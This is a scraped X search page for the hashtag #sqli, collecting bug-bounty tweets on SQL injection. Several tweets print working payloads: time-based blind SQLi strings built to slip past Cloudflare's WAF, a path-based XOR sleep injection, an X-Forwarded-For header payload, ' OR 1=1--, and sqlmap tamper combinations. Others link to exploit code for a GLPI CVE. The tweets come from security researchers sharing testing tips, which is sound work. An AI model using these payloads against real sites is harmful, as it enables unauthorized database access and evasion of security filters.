Español
English Indonesia Türkçe Deutsch Español Português Pусский Français Italiano Nederlands Polski العربية ไทย Tiếng Việt 繁體中文 简体中文 日本語 한국어

#sqli resultados de búsqueda

nav1n0x's profile picture. Github: https://t.co/7MrKOcUFfO | 2x MVR @msftsecurity
N$
@nav1n0x
13 jun

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

nav1n0x's tweet image. Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
nav1n0x's tweet image. Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
7
121
717
534
31K
nav1n0x's profile picture. Github: https://t.co/7MrKOcUFfO | 2x MVR @msftsecurity
N$
@nav1n0x
6 jul

Discovered a very interesting path based SQLi yesterday. Injected: /‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/ → No delay /page/‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/test.test triggered delay. Same payload, different results. Here's why👇 1/4 #BugBounty #SQLi #WebSec

nav1n0x's tweet image. Discovered a very interesting path based SQLi yesterday. Injected: /‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/ → No delay /page/‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/test.test triggered delay. Same payload, different results. Here's why👇 1/4 #BugBounty #SQLi #WebSec
6
115
628
462
40K
Mr_Dark55's profile picture. Bug Bounty | Pentester | Ethical Hacking | 孤独が私の中に染み込んでほしい。🖤
./Mr-Dark
 @Mr_Dark55
30 dic

💉 SQL injection bypassing Cloudflare When testing a site, you can bypass Cloudflare's SQL injection protection using sqlmap and a combination of space2comment, between, randomcase tamper scripts. #web #sqli

Mr_Dark55's tweet image. 💉 SQL injection bypassing Cloudflare When testing a site, you can bypass Cloudflare's SQL injection protection using sqlmap and a combination of space2comment, between, randomcase tamper scripts. #web #sqli
10
44
330
191
16K
NullSecurityX's profile picture. Infosec researcher • Bug bounties & security analysis. Collabs/ads: root@nullsecurityx.codes /
NullSecX
 @NullSecurityX
4 ago

SQLite Injection via WebSQL API 1️⃣ Some apps use openDatabase() in JS to store/query user data 2️⃣ If input is inserted directly into SQL: db.transaction(t => { t.executeSql(`SELECT * FROM users WHERE name = '${input}'`); }); 3️⃣ ' OR 1=1-- → dumps users #BugBounty #sqli

NullSecurityX's tweet image. SQLite Injection via WebSQL API 1️⃣ Some apps use openDatabase() in JS to store/query user data 2️⃣ If input is inserted directly into SQL: db.transaction(t => { t.executeSql(`SELECT * FROM users WHERE name = '${input}'`); }); 3️⃣ ' OR 1=1-- → dumps users #BugBounty #sqli
3
32
180
66
6K
NullSecurityX's profile picture. Infosec researcher • Bug bounties & security analysis. Collabs/ads: root@nullsecurityx.codes /
NullSecX
 @NullSecurityX
24 ago

GoDaddy SQL Injection Vulnerability..:) Follow Us: youtube.com/@nullsecurityx #BugBounty #Cybersecurity #sqli #Pentesting

NullSecurityX's tweet image. GoDaddy SQL Injection Vulnerability..:) Follow Us: youtube.com/@nullsecurityx #BugBounty #Cybersecurity #sqli #Pentesting
2
46
310
178
23K
0xElkot's profile picture. Cyber Security Consultant | Security Researcher (Part time)
MahMoud Elkot
 @0xElkot
16 abr

🔍 Tip for finding SQLi in WordPress plugins: - Study the code—check $wpdb queries & inputs. - Enumerate endpoints, forms, params w/ WPScan or manually. - Test for SQLi w/ payloads like ' OR 1=1 --. 💡 Might lead to a private CVE! Stay ethical #BugBounty #SQLi

0xElkot's tweet image. 🔍 Tip for finding SQLi in WordPress plugins: - Study the code—check $wpdb queries & inputs. - Enumerate endpoints, forms, params w/ WPScan or manually. - Test for SQLi w/ payloads like ' OR 1=1 --. 💡 Might lead to a private CVE! Stay ethical #BugBounty #SQLi
0xElkot's tweet image. 🔍 Tip for finding SQLi in WordPress plugins: - Study the code—check $wpdb queries & inputs. - Enumerate endpoints, forms, params w/ WPScan or manually. - Test for SQLi w/ payloads like ' OR 1=1 --. 💡 Might lead to a private CVE! Stay ethical #BugBounty #SQLi
2
16
137
92
7K
Raman_Mohurle's profile picture. Microsoft MVR 2024 | MSRC #44 in 2022 Q3 | GPCSSI Intern | RHCSA | N+ | Bug Bounty Hunter | Ethical Hacker 👩‍💻 #GPCSSI21 #BUGBOUNTY
Raman_MG
 @Raman_Mohurle
7 sept

Found an untouched asset (built in 2018) with an unsubscribe functionality. Turned out it was vulnerable to time-based blind SQLi → from a single entry point I accessed 200+ databases. Patience + curiosity always pay off 💰€€€€ #BugBounty #SQLi #bugbountytips Thread 🧵…

Raman_Mohurle's tweet image. Found an untouched asset (built in 2018) with an unsubscribe functionality. Turned out it was vulnerable to time-based blind SQLi → from a single entry point I accessed 200+ databases. Patience + curiosity always pay off 💰€€€€ #BugBounty #SQLi #bugbountytips Thread 🧵…
5
22
312
152
29K
mamunwhh's profile picture. Cyber security researcher| Red team member | Bug Bounty Hunter | (whh)white hat hacker at @Hacker0x01 @intigriti @hackenproof
khan mamun
 @mamunwhh
7 dic

I found Blind SqLI just added #sqli payload Tips : X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(8),0))XOR'

2
26
227
171
11K
awais0x1's profile picture. Full Time Bug Bounty Hunter
Awais Nazeer
 @awais0x1
8 nov

I love this kind of Burp message that sweet SQL error. Tip: Build your own Burp Suite scanner to catch these automatically. credit to @HaroonHameed40 @intigriti @PortSwigger #InfoSec #SQLi

awais0x1's tweet image. I love this kind of Burp message that sweet SQL error. Tip: Build your own Burp Suite scanner to catch these automatically. credit to @HaroonHameed40 @intigriti @PortSwigger #InfoSec #SQLi
awais0x1's tweet image. I love this kind of Burp message that sweet SQL error. Tip: Build your own Burp Suite scanner to catch these automatically. credit to @HaroonHameed40 @intigriti @PortSwigger #InfoSec #SQLi
4
2
135
44
5K
viehgroup's profile picture. We're hacking for your better Future
VIEH Group
 @viehgroup
1 sept

Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi

viehgroup's tweet image. Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
viehgroup's tweet image. Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
3
86
508
367
25K
kuldeepdotexe's profile picture. OSINT | Web | Binary | sensei@barracks.army | @SynackRedTeam Envoy && Hero
Kuldeep Pandya
 @kuldeepdotexe
2 nov 2024

🕷️Exploiting Unconventional SQLis Manually 💉 A thread 🧵 1/n #sqli #synack #srt

kuldeepdotexe's tweet image. 🕷️Exploiting Unconventional SQLis Manually 💉 A thread 🧵 1/n #sqli #synack #srt
15
100
623
516
57K
wgujjer11's profile picture. Cybersecurity Analyst | Ethical Hacker | Secure @nasa | #CyberSecurity #
Muhammad Waseem
 @wgujjer11
3 abr

Pre-Auth SQL Injection CVE-2025-24799 Severity : Critical Exploit : github.com/MuhammadWaseem… Refrence : github.com/glpi-project/g… #GLPI #SQLi #CVE202524799

wgujjer11's tweet image. Pre-Auth SQL Injection CVE-2025-24799 Severity : Critical Exploit : github.com/MuhammadWaseem… Refrence : github.com/glpi-project/g… #GLPI #SQLi #CVE202524799
5
93
488
278
22K
nav1n0x's profile picture. Github: https://t.co/7MrKOcUFfO | 2x MVR @msftsecurity
N$
@nav1n0x
10 may

Make sure to test mobile endpoints, not just mobile apps—test m.target.com. Mobile front-ends often run on separate infra, different WAF policies with different code base for huge sites like gaming/chat etc, hiding unique vuln surfaces...#BugBounty #SQLi #SQLMap [1/n]

nav1n0x's tweet image. Make sure to test mobile endpoints, not just mobile apps—test m.target.com. Mobile front-ends often run on separate infra, different WAF policies with different code base for huge sites like gaming/chat etc, hiding unique vuln surfaces...#BugBounty #SQLi #SQLMap [1/n]
6
18
285
119
15K
HackingTeam777's profile picture. #hacking #tecnología #cybersecurity #CyberSecurityNews #infosec #pentesting #cybersecurityawareness #informationsecurity #cyber #github #redteam #blueteam #ia
ӉѦСҠіИԌ ҬЄѦӍ
@HackingTeam777
23 sept

Second-Order SQL Injection 1️⃣ Attacker injects payload into a field that is stored in DB (e.g., username). 2️⃣ Later, another query uses this stored value unsafely. 3️⃣ Payload executes → data leak, auth bypass, or privilege escalation. #SQLi #BugBounty #WebSecurity

HackingTeam777's tweet image. Second-Order SQL Injection 1️⃣ Attacker injects payload into a field that is stored in DB (e.g., username). 2️⃣ Later, another query uses this stored value unsafely. 3️⃣ Payload executes → data leak, auth bypass, or privilege escalation. #SQLi #BugBounty #WebSecurity
0
6
35
12
2K
wtf_yodhha's profile picture. I'm world last $0 million dollar hacker.
Brut 🇮🇳
 @wtf_yodhha
24 ene

⚡️SQLi Time Based Payloads ✅Join Telegram to Download- t.me/brutsecurity/1… #sqli #bugbounty #bugbountytips

wtf_yodhha's tweet image. ⚡️SQLi Time Based Payloads ✅Join Telegram to Download- t.me/brutsecurity/1… #sqli #bugbounty #bugbountytips
2
17
104
57
4K
No hay resultados para "#sqli"
No hay resultados para "#sqli"
No hay resultados para "#sqli"

Something went wrong.


Something went wrong.


United States Trends